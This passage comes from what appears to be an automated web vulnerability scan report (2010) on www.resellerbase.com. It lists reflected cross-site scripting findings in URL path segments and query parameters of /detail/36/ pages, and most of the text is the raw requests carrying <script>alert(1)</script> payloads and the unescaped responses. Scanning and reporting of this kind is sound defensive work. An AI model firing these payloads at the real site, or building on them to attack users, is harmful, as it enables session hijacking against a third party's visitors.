...[SNIP]...
<p>The requested URL /detail784ec<script>alert(1)</script>25920f9ce56/36/ was not found on this server.</p>
...[SNIP]...

2.2433. http://www.resellerbase.com/detail/36/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 317ad<script>alert(1)</script>d08bc1e9260 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36317ad<script>alert(1)</script>d08bc1e9260/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36317ad<script>alert(1)</script>d08bc1e9260/ was not found on this server.</p>
...[SNIP]...

2.2434. http://www.resellerbase.com/detail/36/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e1b4a<script>alert(1)</script>a352411666b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/?e1b4a<script>alert(1)</script>a352411666b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/?e1b4a<script>alert(1)</script>a352411666b=1 was not found on this server.</p>
...[SNIP]...

2.2435. http://www.resellerbase.com/detail/36/nemproduction-com-german.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/nemproduction-com-german.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2cb2<script>alert(1)</script>d318151dfe6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild2cb2<script>alert(1)</script>d318151dfe6/36/nemproduction-com-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild2cb2<script>alert(1)</script>d318151dfe6/36/nemproduction-com-german.html was not found on this server.</p>
...[SNIP]...

2.2436. http://www.resellerbase.com/detail/36/nemproduction-com-german.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/36/nemproduction-com-german.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4629b<a>b8f0e38ba9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/364629b<a>b8f0e38ba9e/nemproduction-com-german.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/364629b<a>b8f0e38ba9e/nemproduction-com-german.html was not found on this server.</p>
...[SNIP]...

2.2437. http://www.resellerbase.com/detail/36/nemproduction-com-german.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/nemproduction-com-german.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8bc8a<script>alert(1)</script>366261e8489 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/8bc8a<script>alert(1)</script>366261e8489 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/8bc8a<script>alert(1)</script>366261e8489 was not found on this server.</p>
...[SNIP]...

2.2438. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 281a9<script>alert(1)</script>39e508f508e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail281a9<script>alert(1)</script>39e508f508e/36/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail281a9<script>alert(1)</script>39e508f508e/36/rating.php was not found on this server.</p>
...[SNIP]...

2.2439. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a840f<script>alert(1)</script>7c317c5ab6c0c325 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detaila840f<script>alert(1)</script>7c317c5ab6c0c325/36/rating.php?id=36&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/nemproduction-com-german.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila840f<script>alert(1)</script>7c317c5ab6c0c325/36/rating.php?id=36&rating=5 was not found on this server.</p>
...[SNIP]...

2.2440. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 502d3<script>alert(1)</script>e6eb85d81fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36502d3<script>alert(1)</script>e6eb85d81fe/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36502d3<script>alert(1)</script>e6eb85d81fe/rating.php was not found on this server.</p>
...[SNIP]...

2.2441. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7f81<script>alert(1)</script>273645b20c121041a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/36c7f81<script>alert(1)</script>273645b20c121041a/rating.php?id=36&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/nemproduction-com-german.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:27:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36c7f81<script>alert(1)</script>273645b20c121041a/rating.php?id=36&rating=5 was not found on this server.</p>
...[SNIP]...

2.2442. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 67fc4<script>alert(1)</script>4499ca9fc14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/rating.php67fc4<script>alert(1)</script>4499ca9fc14 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/rating.php67fc4<script>alert(1)</script>4499ca9fc14 was not found on this server.</p>
...[SNIP]...

2.2443. http://www.resellerbase.com/detail/36/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9b23d<script>alert(1)</script>1e59b74802571168a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/36/rating.php9b23d<script>alert(1)</script>1e59b74802571168a?id=36&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/nemproduction-com-german.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:28:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/rating.php9b23d<script>alert(1)</script>1e59b74802571168a?id=36&rating=5 was not found on this server.</p>
...[SNIP]...

2.2444. http://www.resellerbase.com/detail/36/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b68c9<script>alert(1)</script>b44e18046d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/rating.php?b68c9<script>alert(1)</script>b44e18046d9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/rating.php?b68c9<script>alert(1)</script>b44e18046d9=1 was not found on this server.</p>
...[SNIP]...

2.2445. http://www.resellerbase.com/detail/36/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d2c46<script>alert(1)</script>793584323599f1f6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/36/rating.php/d2c46<script>alert(1)</script>793584323599f1f6c?id=36&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/nemproduction-com-german.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/rating.php/d2c46<script>alert(1)</script>793584323599f1f6c?id=36&rating=5 was not found on this server.</p>
...[SNIP]...

2.2446. http://www.resellerbase.com/detail/36/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 215b6<script>alert(1)</script>0e5e8fba8cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail215b6<script>alert(1)</script>0e5e8fba8cd/36/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail215b6<script>alert(1)</script>0e5e8fba8cd/36/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2447. http://www.resellerbase.com/detail/36/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e24d8<script>alert(1)</script>cba21262594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36e24d8<script>alert(1)</script>cba21262594/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36e24d8<script>alert(1)</script>cba21262594/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2448. http://www.resellerbase.com/detail/36/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 348d9<script>alert(1)</script>693b58b49d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/search.php348d9<script>alert(1)</script>693b58b49d3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/search.php348d9<script>alert(1)</script>693b58b49d3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2449. http://www.resellerbase.com/detail/36/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/36/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 6eb08<a>415a653e0a1 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/36/search.php?keyword=search...&Submit3=Search6eb08<a>415a653e0a1&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/search.php?keyword=search...&Submit3=Search6eb08<a>415a653e0a1&opt=2 was not found on this server.</p>
...[SNIP]...

2.2450. http://www.resellerbase.com/detail/36/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/36/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 25d2f<a>326b614cf84 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/36/search.php?keyword=search...25d2f<a>326b614cf84&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/search.php?keyword=search...25d2f<a>326b614cf84&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2451. http://www.resellerbase.com/detail/36/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ccddc<script>alert(1)</script>810402765d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/search.php?keyword=search...&Submit3=Search&opt=2&ccddc<script>alert(1)</script>810402765d4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

